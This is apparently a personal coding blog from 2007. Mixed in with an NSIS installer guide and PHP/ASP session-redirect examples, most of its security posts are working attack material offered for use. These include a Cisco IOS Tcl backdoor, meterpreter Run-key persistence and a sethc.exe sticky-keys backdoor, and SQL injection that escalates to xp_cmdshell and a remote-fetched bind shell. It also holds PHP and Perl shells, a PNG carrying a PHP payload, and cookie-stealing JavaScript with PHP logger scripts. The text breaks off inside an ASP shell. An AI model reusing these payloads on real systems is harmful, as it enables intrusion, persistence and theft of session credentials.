It's the code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No wait.. it should be just RUBY!

20071128

Shell code for IOS using tclsh on Cisco devices..

A nice article from IRM describes a simple way to create a Tcl backdoor for Cisco IOS. You can read the white paper here.
Oops: didn't know what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only

# Called once per accepted TCP connection: print a banner, show the IOS
# version and current privilege level, then hand the socket to echo.
proc callback {sock addr port} {
    fconfigure $sock -translation lf -buffering line
    puts $sock " "
    puts $sock "-------------------------------------"
    puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
    puts $sock "-------------------------------------"
    puts $sock " "
    set response [exec "sh ver | inc IOS"]
    puts $sock $response
    set response [exec "sh priv"]
    puts $sock $response
    puts $sock " "
    puts $sock "Enter IOS command:"
    fileevent $sock readable [list echo $sock]
}

# Every line received is passed straight to the IOS exec, with the privilege
# of whoever started tclsh. No authentication, no filtering.
proc echo {sock} {
    global var
    if {[eof $sock] || [catch {gets $sock line}]} {
        close $sock
    } else {
        set response [exec "$line"]
        puts $sock $response
    }
}

set port 1234
set sh [socket -server callback $port]
# var is never written, so vwait sits in the event loop and the listener stays up
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.
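The detection-side counterpart, added here and not part of the IRM paper or this post: the script greets every connection with a fixed banner followed by the output of "sh ver | inc IOS" and "sh priv", so a scanner only has to connect and read. The banner capture below is constructed from the puts lines above; the probe() helper does real network I/O and is not exercised by the sample.

```python
import re
import socket

# Banner text the IRM TclShell script prints on connect (copied from its puts
# lines). What follows it on a real device is the output of "sh ver | inc IOS"
# and "sh priv".
TCLSHELL_MARK = re.compile(r"TclShell v\d+\.\d+ by Andy Davis, IRM")
IOS_VERSION = re.compile(r"IOS .*?Version ([^,\s]+)")
PRIV_LEVEL = re.compile(r"Current privilege level is (\d+)")

# Constructed capture of what a listener running the script above would send.
SAMPLE_BANNER = (
    b" \n-------------------------------------\n"
    b"TclShell v0.1 by Andy Davis, IRM 2007\n"
    b"-------------------------------------\n \n"
    b"Cisco IOS Software, C2800 Software (C2800NM-ADVIPSERVICESK9-M), "
    b"Version 12.4(15)T1, RELEASE SOFTWARE (fc2)\n"
    b"Current privilege level is 15\n \n"
    b"Enter IOS command:\n"
)


def classify_banner(data: bytes) -> dict:
    """Return what a TclShell banner gives away, or {'tclshell': False}."""
    text = data.decode("ascii", errors="replace")
    if not TCLSHELL_MARK.search(text):
        return {"tclshell": False}
    ver = IOS_VERSION.search(text)
    priv = PRIV_LEVEL.search(text)
    return {
        "tclshell": True,
        "ios_version": ver.group(1) if ver else None,
        # the shell runs at the privilege of whoever started tclsh; 15 = enable
        "privilege": int(priv.group(1)) if priv else None,
    }


def probe(host: str, port: int = 1234, timeout: float = 3.0) -> dict:
    """Connect, read the greeting up to the prompt, classify it.
    The script greets without waiting for input, so no command is ever sent.
    Does network I/O; not used by the offline sample."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            while b"Enter IOS command:" not in buf:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
    return classify_banner(buf)
```

Run probe() against TCP/1234 on anything you suspect has had tclsh sourced from a TFTP server; the banner match alone is enough for a detection rule, the version and privilege fields tell you what the finder is looking at.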

20071119

Low hanging fruit

Hacking old skool Windows..

Notes from a CEH. Nothing new, but at least the basics are covered. All of this should be automated by some wrapper so you don't waste time.. Generally you could do all of it in BackTrack or a similar build.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

20071116

RSS / ATOM - Security Tagging Framework for Yahoo Pipes

I've been using Yahoo Pipes for a while to help filter some of the junk on full-disclosure. Tagging became part of my daily habits, so I thought it most appropriate to create auto-taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE: an array of regular expressions that strips off unnecessary titles, duplicates and responses, and adds pre-titles such as {Vulnerability}{Web-based}.

I've also created an example of how to use the framework with existing Yahoo Pipes.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on Pipes and their flexibility when used with a JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance

20070711

QRcode - semantic posting...

Email: r@qry.jp

QRcode decoding through the web... enjoy the robot.

20070620

SQL injection information and tools

Wow.. there's been a blow-up recently in SQL injection tools and rootkits. This has been a great boom compared to the older, semi-dead projects.

I've found the Perl blind SQL brute-force tools to be the most helpful in scanning.
http://www.514.es/download/bsqlbfv1.2-th.pl

Here was a quick shot of other multiple sql tools
http://www.unsec.net/2006/11/herramientas_sql_injection.html

The OWASP one, SQLiX, always needs some help..
http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project

Current updated list of SQL injection tools
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners

Argeniss - Great in-depth data and such
Hacking Databases for owning your data (Full root kits for oracle and tsql)
http://www.argeniss.com/research.html

20070510

Building NSIS Installers for Large File Distributions

I've been working on some solutions recently to distribute large data sets made up of numerous groups of compressed files. I decided the best way to dummy-proof this was to wrap an installer around them and do it "right". So here is how to do that with an installer.

If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application, a couple more containing the app, and maybe a required piece of library software like WinPcap), you need a robust solution such as the Nullsoft Scriptable Install System - NSIS.

The most logical idea is to create a single file, but NSIS does have file size limitations within its compiler: currently about 2GB. So deploying a package of, say, 8GB (something that might normally fit on a dual-layer DVD) is not possible with a standard single-file NSIS installer. This solution uses an external plugin to decompress the files from the same directory as the installer. That lets you create large file distributions that can be delivered on large media or across gigabit-speed networks.

Tools Req:

7zip [installer] - Compression Utility
Notepad++ [installer] - IDE
NSIS [installer]
UltraModernUI NSIS User Interface [installer] - personal choice of GUI for NSIS installer
Untgz Contrib plugin [installer] - Decompression library

Files to distribute:
compressed_1.tar
-- decomp_set1of5_file1of2.txt
-- decomp_set1of5_file2of2.txt
compressed_2.tar
-- decomp_set2of5_file1of3.txt
-- decomp_set2of5_file2of3.txt
-- decomp_set2of5_file3of3.txt
compressed_3.tar
-- decomp_set3of5_file1of2.txt
-- decomp_set3of5_file2of2.txt
compressed_4.tar
-- decomp_set4of5_file1of1.txt
compressed_5.tar
-- decomp_set5of5_file1of3.txt
-- decomp_set5of5_file2of3.txt
-- decomp_set5of5_file3of3.txt

!include LogicLib.nsh

; compressed_#.tar must sit next to the setup executable ($EXEDIR). The tars
; are not packed into the installer, so .onInit checks for them up front.
; untgz plugin switches:
;   -j      junk paths (extract flat into the destination)
;   -d      destination directory
;   -znone  compressed_#.tar is a plain tar collection, not gzipped; the
;           plugin has to be told so (-zgz / -zbz2 / -zlzma otherwise)
Section -decompress SecDecompress
  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\compressed_1.tar"
  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\compressed_2.tar"
  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\compressed_3.tar"
  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\compressed_4.tar"
  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\compressed_5.tar"

  ; Verify every expected file actually landed before calling it a success.
  ${If} ${FileExists} "$INSTDIR\decomp_set1of5_file1of2.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set1of5_file2of2.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file1of3.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file2of3.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file3of3.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file1of2.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file2of2.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set4of5_file1of1.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file1of3.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file2of3.txt"
  ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file3of3.txt"
    ;If the tar files were packaged into the setup you can delete them like this :)
    ;Delete "$INSTDIR\compressed_1.tar"
  ${Else}
    MessageBox MB_OK|MB_ICONEXCLAMATION "Installation Failure. Media may be corrupt."
    ;Banner::destroy   ; only needed if Banner::show was called earlier
    Abort
  ${EndIf}
SectionEnd

; .onInit comes after the Section so that ${SecDecompress} is already defined.
Function .onInit
  ; Section size must be set manually: NSIS will not compute required disk
  ; space for files it does not package itself. The unit is kilobytes.
  ; 8 GB in kilobytes = 8,388,608
  SectionSetSize ${SecDecompress} 8388608

  ${If} ${FileExists} "$EXEDIR\compressed_1.tar"
  ${AndIf} ${FileExists} "$EXEDIR\compressed_2.tar"
  ${AndIf} ${FileExists} "$EXEDIR\compressed_3.tar"
  ${AndIf} ${FileExists} "$EXEDIR\compressed_4.tar"
  ${AndIf} ${FileExists} "$EXEDIR\compressed_5.tar"
    Return
  ${Else}
    MessageBox MB_OK|MB_ICONINFORMATION "This copy of the installer is missing a compressed_#.tar file.."
    Abort
  ${EndIf}
FunctionEnd
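Since NSIS cannot size a section for files it does not package, and the list of FileExists checks has to match the archive contents exactly, both are better generated than typed. The Python below is an added example (not the author's build script): it reads the tar archives that will ship beside the installer, sums their member sizes, and renders the section and .onInit in the same shape as the script above. The two small archives it builds in a temp directory are constructed test data.

```python
import os
import tarfile
import tempfile


def make_tar(path, files):
    """Write {name: byte_count} as plain (uncompressed) tar members.
    Used only to build constructed sample archives for the demo."""
    with tarfile.open(path, "w") as tf:
        for name, n in files.items():
            p = os.path.join(os.path.dirname(path), name)
            with open(p, "wb") as fh:
                fh.write(b"x" * n)
            tf.add(p, arcname=name)


def tar_manifest(tar_paths):
    """Per archive: (basename, [member basenames], uncompressed size in bytes).
    Basenames match what untgz -j (junk paths) will actually write."""
    out = []
    for path in tar_paths:
        with tarfile.open(path, "r:*") as tf:
            members = [m for m in tf.getmembers() if m.isfile()]
            out.append((os.path.basename(path),
                        [os.path.basename(m.name) for m in members],
                        sum(m.size for m in members)))
    return out


def section_kilobytes(manifest):
    """SectionSetSize wants kilobytes; round up so the space check is never short."""
    total = sum(size for _, _, size in manifest)
    return (total + 1023) // 1024


def render_nsi(manifest):
    kb = section_kilobytes(manifest)
    lines = ["!include LogicLib.nsh", "",
             "; generated from the archives: section size and file checks",
             "Section -decompress SecDecompress"]
    for tar, _, _ in manifest:
        lines.append('  untgz::extract -j -d "$INSTDIR" -znone "$EXEDIR\\%s"' % tar)
    expected = [f for _, files, _ in manifest for f in files]
    lines.append('  ${If} ${FileExists} "$INSTDIR\\%s"' % expected[0])
    for f in expected[1:]:
        lines.append('  ${AndIf} ${FileExists} "$INSTDIR\\%s"' % f)
    lines += ['    DetailPrint "All %d files extracted"' % len(expected),
              "  ${Else}",
              '    MessageBox MB_OK|MB_ICONEXCLAMATION "Installation Failure. Media may be corrupt."',
              "    Abort",
              "  ${EndIf}",
              "SectionEnd", "",
              "Function .onInit",
              "  SectionSetSize ${SecDecompress} %d" % kb,
              '  ${If} ${FileExists} "$EXEDIR\\%s"' % manifest[0][0]]
    for tar, _, _ in manifest[1:]:
        lines.append('  ${AndIf} ${FileExists} "$EXEDIR\\%s"' % tar)
    lines += ["    Return", "  ${Else}",
              '    MessageBox MB_OK|MB_ICONINFORMATION "This copy of the installer is missing a compressed_#.tar file."',
              "    Abort", "  ${EndIf}", "FunctionEnd"]
    return "\n".join(lines) + "\n"


def demo():
    """Build two constructed sample archives and generate the script for them."""
    d = tempfile.mkdtemp(prefix="nsisdemo_")
    make_tar(os.path.join(d, "compressed_1.tar"),
             {"decomp_set1of2_file1of2.txt": 1500, "decomp_set1of2_file2of2.txt": 600})
    make_tar(os.path.join(d, "compressed_2.tar"),
             {"decomp_set2of2_file1of1.txt": 4096})
    manifest = tar_manifest([os.path.join(d, "compressed_1.tar"),
                             os.path.join(d, "compressed_2.tar")])
    return manifest, render_nsi(manifest)


if __name__ == "__main__":
    print(demo()[1])
```

Point tar_manifest() at the real compressed_1..5.tar and write render_nsi()'s output into the .nsi; rerun it whenever the data set changes so the size and the check list never drift from the archives.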

20070403

Session redirect in php and asp

These are examples of the correct way to handle access checks and redirects in sessions in classic ASP (VBScript) and PHP.. I don't know how many times I see this done wrong..

ASP example

<%
If NOT Session("Authenticated") = 1 Then
    Response.Redirect "login.asp"
    ' In classic ASP, Response.Redirect ends the response (it implies Response.End),
    ' so nothing below this point runs for an unauthenticated user.
    ' ASP.NET's equivalent is Response.Redirect("login.asp", True).
End If
%>


PHP Example
<?php
session_start();
if (!isset($_SESSION['access']) || $_SESSION['access'] != "yes") {
    header("Location: login.php"); /* Redirect browser */
    exit; /* Make sure that code below does not get executed when we redirect. */
}
// Code following should not be executed unless authenticated.
echo "secure code";
?>


Note: Since PHP 4.4.2 and PHP 5.1.2 header() refuses to send more than one header at once, as protection against header injection attacks.
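The same check as a tiny WSGI app, written for this page (not from the original post), with the broken and fixed handlers side by side: the broken one emits the Location header but keeps running, exactly the mistake the examples above guard against with exit. The session is a constructed environ["app.session"] dict standing in for $_SESSION, and call() drives the app in-process so it runs without a server.

```python
SECRET = b"secure code"


def _redirect(start_response, location="/login"):
    """302 with an empty body; the Python equivalent of header()+exit."""
    start_response("302 Found", [("Location", location),
                                 ("Content-Type", "text/plain")])
    return [b""]


def app_broken(environ, start_response):
    """The common mistake: the redirect header goes out, but execution
    continues and the protected body is still returned to the client."""
    session = environ.get("app.session", {})
    if session.get("access") != "yes":
        start_response("302 Found", [("Location", "/login"),
                                     ("Content-Type", "text/plain")])
        # missing return here: falls through to the protected content
    else:
        start_response("200 OK", [("Content-Type", "text/plain")])
    return [SECRET]


def app_fixed(environ, start_response):
    """Redirect and stop; the protected body is only built once the check passed."""
    session = environ.get("app.session", {})
    if session.get("access") != "yes":
        return _redirect(start_response)
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [SECRET]


def call(app, session):
    """Drive a WSGI app in-process with a constructed environ.
    Returns (status, headers dict, body bytes)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/secret",
               "app.session": session}  # assumed key, stands in for $_SESSION
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body
```

A browser follows the 302 and never shows the leaked body, which is why the bug survives casual testing; curl, a proxy, or any client that ignores redirects reads the protected content straight out of the "redirect" response.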

20070330

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

Eh.. ergg.. cough.. die. This fad is getting old.. I hate even commenting on this at all.

20070328

Setting and Confirming reg keys w/meterpreter.

Super quick meterpreter sequence (sbdbg.exe is the Windows sbd binary).
Prep
upload c:\\sbdbg.exe c:\\windows\\system32\\


Set
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbg.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"


Verify
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor


Use
(reboot)

20070323

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bringing together vulnerability result information. I found it a major pain in the ass to remove duplicate entries from result sets. I was finally able to come up with a listing based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus information can be a huge problem. Because of the lack of structure within the NASL scripting language, there are many, many variations in the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive-style CSV (several BID or CVE numbers pipe-separated inside one cell) as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Database (OSVDB), which has come a long way.

20070315

Pentest Order of Objects..

ISSAF was used in conjunction with the latest BackTrack release.
Although it is not my company's standard, it is quite close.

Not to be too open.. but this has led to a really good idea for object-oriented coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milw0rm / SecurityFocus)

GAINING ACCESS AND PRIVILEGE ESCALATION

-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Privileged Assessment (repeat all steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

20070313

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. I'm referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor, located @ http://tigerteam.se/dl/sbd/. This is my preferred "swiss army knife" because of its default configuration of encryption (AES-CBC-128 + HMAC-SHA1) and dangerous execution binding (-e command).



Netcat and its NC Clones:

  • netcat - "swiss army knife"
  • sbd & sbdbg.exe - shadowinteger's backdoor
  • netcat6 - swiss army knife+ for ipv6
  • cryptcat - netcat with twofish encryption
  • socat - multipurpose relay (netcat++) with IPv6/SSL. Example usage, listening on IPv6 port 8080 and forwarding through an HTTP proxy host "proxy" to www.domain.com:80:
    socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80

Simpler tools:
None of this is news.. I just wanted to point out some of this simple stuff.

20070308

sbd fun as a rootkit via sethc.exe

SBD Fun

Transferring files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 -q 10


Transferring files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz -
XMIT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337


Port scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000


Using cmd.exe bound to a service
In my experience this is flaky at best..

create then start the service (type= interact has to be combined with type= own):
sc create testsvc binpath= "cmd /K start" type= own type= interact
sc start testsvc


Note that SC START immediately creates a new CMD window, even though the service itself fails to start with error 1053 (this is expected, since CMD.EXE doesn't have any service-related code in it and never reports back to the SCM).

What the SCM expects when it starts a service:
StartServiceCtrlDispatcher and RegisterServiceCtrlHandler API calls

We may want to fix up any C program to actually make those calls if it is to load as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost.exe in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    // Let's restrict the bind address to localhost only.. pls.
    // -l listen, -p port, -a address to bind, -e program handed to the connection.
    // system() goes through cmd.exe /c and blocks until sbd exits.
    system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
    return EXIT_SUCCESS;
}


Rootkit portion
Rename the output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any existing sethc.exe entries in c:\windows\prefetch prior to use.

Interesting note about RDC
Sticky Keys [left-shift x5] (sethc.exe) works through Remote Desktop Connections (RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM kernel security shuts down all unknown processes in a sweep about 5 minutes into the session.

Could a fake handler for WM_CLOSE help? Or is it a terminate...

20070307

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
// ?c=init starts a fresh log; anything else is appended with the requester's
// IP. The response is always a 1x1 PNG so it can be loaded as an <img>.
$cookie = isset($_GET["c"]) ? $_GET["c"] : "";
if ($cookie == "init") {
    $file = fopen('001.txt', 'w');
    fwrite($file, ":: 00* Logger:: \n");
} else {
    $file = fopen('001.txt', 'a');
    fwrite($file, $_SERVER['REMOTE_ADDR'] . "=>" . $cookie . "\n");
}
fclose($file);
header("Content-type: image/png");
$im = imageCreate(1, 1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
?>


I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify the SQL server through blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL only executes a /*!NNNNN ... */ version comment when the server is at least that version, so if the page changes MySQL is at least 4.0.17.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


MS-SQL

Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa (MSDASQL with SERVER=; uses the current trusted connection)
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';'sa';'','select @@version')

Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

20070306

reverse-shell from SQL server

So you got the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to the SQL box with what is already on it:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:
net user [name] [password] /add

On the semi-evil box you host (serve TFTP or FTP):
sbdbg.exe

{SQL template} set up FTP command script:
ECHO GET sbdbg.exe > script.ftp
ECHO QUIT >> script.ftp

{SQL template} execute the FTP script (-A = anonymous login):
FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} set up the shell (strictly a bind shell: it listens on the SQL box and you connect in):
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get the time on the server (or use ICMP timestamp requests instead..; time /t prints without prompting for a new value):
time /t

{SQL template} schedule execution of the bat file:
at \\sql.vuln.box 04:20 evil.bat

connect from any.evil.ip
sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
php (server side - local/remote)
- will parse PHP placed in JPEG comments when the file is pulled in via include/require
IE (client side - local)
- will sniff the contents of image files and render HTML/script found inside

PNG headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <= PNG signature
\x00\x00\x00\x0d <= chunk length (13, the size of the IHDR data)
\x77\x6f\x6f\x74 <= chunk id "woot" (a real PNG has "IHDR" here)
\x00\x00\x00\x01 <= width
\x00\x00\x00\x01 <= height
(In IHDR width precedes height; bit depth, colour type, compression, filter and interlace bytes and a CRC32 follow. Anything that only checks the 8-byte signature accepts the "woot" variant.)

Comment writers for jpegs
edjpgcom
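To tie the PNG notes together with the 1x1 PNG the logger above returns: the Python below, added here and not from the original post, writes a minimal valid 1x1 PNG by hand (signature, IHDR with width before height, IDAT, IEND, each with its CRC) and can drop a tEXt chunk into it, which is the PNG counterpart of putting PHP in a JPEG comment. The parser walks the chunk list and verifies every CRC, so it doubles as the check for files that only carry a forged signature. The embedded PHP string is a constructed sample payload.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"  # \x89\x50\x4e\x47\x0d\x0a\x1a\x0a


def chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32 over type and data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def png_1x1(rgb=(255, 255, 255), text=None) -> bytes:
    """Minimal 1x1 8-bit truecolour PNG, like the GD listener output, optionally
    carrying a tEXt chunk (keyword, NUL, text) between IHDR and IDAT."""
    # IHDR: width, height, bit depth, colour type (2 = RGB), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    raw = b"\x00" + bytes(rgb)  # one scanline: filter byte 0, then one RGB pixel
    out = PNG_SIG + chunk(b"IHDR", ihdr)
    if text is not None:
        out += chunk(b"tEXt", b"Comment\x00" + text)
    out += chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")
    return out


def parse_chunks(data: bytes):
    """Walk the chunk list, verifying each CRC. Returns [(type, data), ...]."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG: bad signature")
    pos, out = 8, []
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        out.append((ctype.decode("ascii"), body))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return out


def ihdr_size(data: bytes):
    """(width, height) from IHDR; raises if the file has no valid IHDR."""
    for ctype, body in parse_chunks(data):
        if ctype == "IHDR":
            return struct.unpack(">II", body[:8])
    raise ValueError("no IHDR chunk")


# Constructed payload: what an include() of the file would execute.
SAMPLE_PAYLOAD = b"<?php system($_GET['c']); ?>"
```

The payload only matters if the server side ever includes the file as PHP; an upload handler that re-encodes images through GD (imagecreatefrompng, imagepng) throws the tEXt chunk away along with anything else it did not draw.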

Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>


Using echo
For Windows:
echo: carets (^) are the escape character for cmd.exe's redirection and other special characters.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

Unix:
write "lol" from echo with hex (no newline) to a file
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style):
File receiving
sbd -lvp 1234 < NUL > outfile.ext
Banner grabbing
sbd -c off -v www.microsoft.com 80
Binding a shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

Although plink -raw and telnet are not as good, they can work.

Play with Cookies

Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie view
javascript:alert(document.cookie);


Manipulate cookie
javascript:void(document.cookie="variable=value");


stealer.php
<?php
/* Ethernet's Cookie Stealer */
/* Put this up on your free site */
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$log = fopen("cookies11.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>


Other stealers
<?php
// Log the cookie, then bounce the victim back to the referring page so
// nothing looks wrong.
$cookie = isset($_GET["c"]) ? $_GET["c"] : "";
$file = fopen('000.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);

$Redirect = getenv("HTTP_REFERER");
// echo $Redirect; // debug

echo "<script>window.location.replace('" . $Redirect . "')</script>";
?>


Perl shell
#!/usr/bin/perl
# Bind shell: listens on $port and gives every connection a $system with
# stdin/stdout/stderr tied to the socket. Use '/bin/sh -i' on Unix.
use strict;
use warnings;
use Socket;
my $port   = 911;
my $proto  = getprotobyname('tcp');
my $system = 'cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
while (my $paddr = accept(CLIENT, SERVER)) {
    open(STDIN,  "<&CLIENT");   # read side of the socket feeds the shell
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
    system($system);            # blocks until the shell exits
    close(STDIN);
    close(STDOUT);
    close(STDERR);
    close(CLIENT);
}


ASP quicky whoami?
<%
Dim objNetwork
Response.Write "Shell Test.."
Set objNetwork = Server.CreateObject("WScript.Network")
Response.Write objNetwork.UserName
Set objNetwork = Nothing
%>


ASP Shell
- expect WshShell.Exec error '80070005' (access denied) when the web user isn't allowed to spawn processes
<%
